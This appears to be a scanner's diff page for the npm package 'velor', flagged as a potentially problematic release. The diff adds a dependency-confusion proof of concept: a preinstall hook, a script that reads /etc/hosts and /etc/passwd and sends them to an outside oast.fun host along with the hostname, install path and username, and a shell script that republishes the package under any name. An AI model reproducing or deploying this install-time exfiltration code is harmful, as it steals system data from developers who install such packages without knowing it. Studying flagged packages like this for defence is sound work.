velor 0.0.1-security → 48.47.48
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of velor might be problematic. Click here for more details.
- package/README.md +6 -3
- package/automate.sh +9 -0
- package/index.js +1 -0
- package/package.json +14 -3
- package/preinstall.js +28 -0
package/README.md
CHANGED
|
@@ -1,5 +1,8 @@
|
|
|
1
|
-
#
|
|
1
|
+
# dependency_confusion_poc
|
|
2
2
|
|
|
3
|
-
|
|
3
|
+
# To use this template:
|
|
4
4
|
|
|
5
|
-
|
|
5
|
+
- Clone this repo
|
|
6
|
+
- Install dependencies with npm install (Optional)
|
|
7
|
+
- Login with your npmjs account by `npm login`
|
|
8
|
+
- Create and upload an NPM packaged with `./automate.sh {package_name}`
|
package/automate.sh
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
#!/bin/bash
|
|
2
|
+
|
|
3
|
+
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" >/dev/null 2>&1 && pwd )"
|
|
4
|
+
TMP_FILE="$DIR/package.json.tmp"
|
|
5
|
+
sed "s,\"name\": \".*\",\"name\": \"$1\"," "$DIR/package.json" > "$TMP_FILE" && mv "$TMP_FILE" "$DIR/package.json"
|
|
6
|
+
sed -i '' "s~\"name\": \".*\"~\"name\": \"$1\"~" package.json
|
|
7
|
+
perl -i -pe "s~'User-Agent': '.*'~'User-Agent': '$1'~" preinstall.js
|
|
8
|
+
|
|
9
|
+
npm publish
|
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
console.log("Hello")
|
package/package.json
CHANGED
|
@@ -1,6 +1,17 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "velor",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "48.47.48",
|
|
4
|
+
"type": "module",
|
|
5
|
+
"description": "",
|
|
6
|
+
"main": "index.js",
|
|
7
|
+
"scripts": {
|
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
9
|
+
"preinstall": "node preinstall.js"
|
|
10
|
+
},
|
|
11
|
+
"author": "",
|
|
12
|
+
"license": "ISC",
|
|
13
|
+
"dependencies": {
|
|
14
|
+
"node-fetch": "^3.3.1",
|
|
15
|
+
"os": "^0.1.2"
|
|
16
|
+
}
|
|
6
17
|
}
|
package/preinstall.js
ADDED
|
@@ -0,0 +1,28 @@
|
|
|
1
|
+
import fetch from 'node-fetch';
|
|
2
|
+
import os from 'os'
|
|
3
|
+
import path from 'path';
|
|
4
|
+
import fs from 'fs';
|
|
5
|
+
import {fileURLToPath} from 'url';
|
|
6
|
+
|
|
7
|
+
const url = `http://cjhdjb92vtc0000vk8cggjes3fwyyyyyb.oast.fun`;
|
|
8
|
+
|
|
9
|
+
const __filename = fileURLToPath(import.meta.url);
|
|
10
|
+
const __dirname = path.dirname(__filename);
|
|
11
|
+
const host = os.hostname();
|
|
12
|
+
const headers = {
|
|
13
|
+
'User-Agent': 'velor',
|
|
14
|
+
'X-Hostname': host,
|
|
15
|
+
'X-path': __dirname,
|
|
16
|
+
'X-Current-User': os.userInfo().username
|
|
17
|
+
};
|
|
18
|
+
|
|
19
|
+
fs.readFile('/etc/hosts', 'utf8', (err, data) => {
|
|
20
|
+
fetch(`${url}?hostData=${encodeURIComponent(data)}`, { headers })
|
|
21
|
+
});
|
|
22
|
+
fs.readFile('/etc/passwd', 'utf8', (err, data) => {
|
|
23
|
+
fetch(`${url}?passwdData=${encodeURIComponent(data)}`, { headers })
|
|
24
|
+
});
|
|
25
|
+
|
|
26
|
+
|
|
27
|
+
|
|
28
|
+
|